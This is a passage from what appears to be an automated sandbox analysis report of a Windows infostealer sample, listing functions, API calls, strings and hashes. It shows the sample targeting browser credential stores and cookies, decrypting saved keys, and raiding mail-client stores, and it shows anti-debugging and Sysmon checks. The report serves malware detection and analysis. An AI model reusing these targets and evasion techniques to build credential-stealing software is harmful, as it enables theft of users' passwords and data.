TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0040ABA7
\??\, xrefs: 0040ACBA
ntdll.dll, xrefs: 0040AF92, 0040B092
kernel32.dll, xrefs: 0040A947

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$\??\$kernel32.dll$ntdll.dll
API String ID: 1475610065-3298706662
Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

Function 0042FD35 Relevance: 14.1, Strings: 11, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

formhistory.sqlite, xrefs: 0042FD98
cert9.db, xrefs: 0042FD86
places.sqlite, xrefs: 00430215
Ku^%, xrefs: 0042FD7B
key4.db, xrefs: 0042FE54
cookies.sqlite, xrefs: 004301F4
Ku^%, xrefs: 0042FE0F
Ku^%, xrefs: 0043018E
Ku^%, xrefs: 0042FFF1
logins.json, xrefs: 00430206
Ku^%, xrefs: 00430089

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
API String ID: 4038537762-2469458786
Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

Function 004262A1 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 391
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(fltl), ref: 004263DE

Strings

A8r, xrefs: 00426415
fltl, xrefs: 004263D9, 004263DD
dll, xrefs: 004263C1
ib.d, xrefs: 004263C9
SysmonDrv, xrefs: 0042662E

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: A8r$SysmonDrv$dll$fltl$ib.d
API String ID: 1029625771-1616023887
Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B

Function 00402476 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 655COMMON

Download Yara Rule

Strings

UL6T, xrefs: 0040263D
M0@, xrefs: 00402DE3
VL6T, xrefs: 00402A09

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: M0@$UL6T$VL6T
API String ID: 0-769956738
Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

Function 0040B129 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 375
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,76FCF770,76FCF770), ref: 0040B792
NtClose.NTDLL ref: 0040B7B1

Strings

LK, xrefs: 0040B723
Y[, xrefs: 0040B682
ntdll.dll, xrefs: 0040B425, 0040B61B, 0040B797

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CloseFileRead
String ID: LK$Y[$ntdll.dll
API String ID: 752142053-4222218168
Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F

Function 00422177 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984

NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5

Strings

^^4, xrefs: 00422365
^^4, xrefs: 0042225A
]^4, xrefs: 00422191
^^4, xrefs: 0042238B

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Query$InformationProcessVirtual
String ID: ]^4$^^4$^^4$^^4
API String ID: 1364735940-2923853987
Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F

Function 0043323B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
GetSystemMetrics.USER32(00000001), ref: 004333C3
GetSystemMetrics.USER32(00000000), ref: 0043341E

Strings

DISPLAY, xrefs: 00433283

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: MetricsSystem$Create
String ID: DISPLAY
API String ID: 1087689917-865373369
Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B

Function 004052D9 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 467encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00405526, 004055F4, 004057CF
crypt32.dll, xrefs: 00405558, 004059AF
os_c576xedrypt.encry576xedpted_key, xrefs: 00405A29

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CryptDataUnprotect
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$crypt32.dll$os_c576xedrypt.encry576xedpted_key
API String ID: 834300711-3884854554
Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A

Function 00401FF9 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 254sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
ExitProcess.KERNEL32 ref: 00402428

Strings

Ku^%, xrefs: 004020FB
Ku^%, xrefs: 00402040

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ExitProcessSleep
String ID: Ku^%$Ku^%
API String ID: 911557368-1067927601
Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B

Function 0042F278 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0042F2C3
\key4.db, xrefs: 0042F317

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$\key4.db
API String ID: 4038537762-486154972
Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF

Function 004224A3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5

Strings

M%, xrefs: 0042277D
M%, xrefs: 0042265C
9a%^, xrefs: 004225B2

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID: 9a%^$M%$M%
API String ID: 1778838933-3204844187
Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A

Function 0042C0DA Relevance: 6.8, Strings: 5, Instructions: 552COMMON

Download Yara Rule

Strings

Mail Clients\Mailbird, xrefs: 0042C138, 0042C424, 0042C474
\MessageIndex, xrefs: 0042C26E
*.db, xrefs: 0042C479
%localappdata%\Mailbird\Store, xrefs: 0042C52E
kernel32.dll, xrefs: 0042C514

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
API String ID: 0-4169501468
Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF

Function 0043B362 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 550stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5

Strings

VL6T, xrefs: 0043BAF5
kernel32.dll, xrefs: 0043B79D
VL6T, xrefs: 0043B6ED

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: VL6T$VL6T$kernel32.dll
API String ID: 1586166983-858732239
Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB

Function 00430228 Relevance: 5.7, Strings: 4, Instructions: 717COMMON

Download Yara Rule

Strings

VL6T, xrefs: 0043093E
VL6T, xrefs: 00430812
kernel32.dll, xrefs: 00430A91
UL6T, xrefs: 00430495

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: UL6T$VL6T$VL6T$kernel32.dll
API String ID: 4038537762-2028718673
Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B

Function 00438E28 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 417COMMON

Download Yara Rule

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043927A, 00439351
gU@, xrefs: 0043935E

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$gU@
API String ID: 0-1743506205
Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B

Function 0042CFBA Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

^^4, xrefs: 0042D32D
^^4, xrefs: 0042D20F
Mail Clients\eM Client, xrefs: 0042CFBE
]^4, xrefs: 0042CFF0

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: Mail Clients\eM Client$]^4$^^4$^^4
API String ID: 0-1928883120
Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB

Function 00453BC4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36

Strings

Eastern Summer Time, xrefs: 00453CE3
Eastern Standard Time, xrefs: 00453CCF

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3335090040-239921721
Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99

Function 0040B7BB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B

Strings

ntdll.dll, xrefs: 0040B7F8

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Close
String ID: ntdll.dll
API String ID: 3535843008-2227199552
Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE

Function 0040B7F5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B

Strings

ntdll.dll, xrefs: 0040B7F8

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Close
String ID: ntdll.dll
API String ID: 3535843008-2227199552
Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB

Function 0097A27E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0097A2A6
Module32First.KERNEL32(00000000,00000224), ref: 0097A2C6

Memory Dump Source

Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9ada0ad67fa060f65aef6af0b80b9f15648bcf5544009763e3386b987eff8959
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C4F06232100711BBD7202BB5988DB6E76ECAF89724F104529E65A914C1DA75EC458A62

Function 004245EC Relevance: 1.7, APIs: 1, Instructions: 207nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811

Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: InformationLibraryLoadQuerySystem
String ID:
API String ID: 1217483125-0
Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B

Function 00421EEB Relevance: 1.7, APIs: 1, Instructions: 153nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B

Function 004244E4 Relevance: 1.6, APIs: 1, Instructions: 71nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87

Function 0042F1C2 Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D

Memory Dump Source

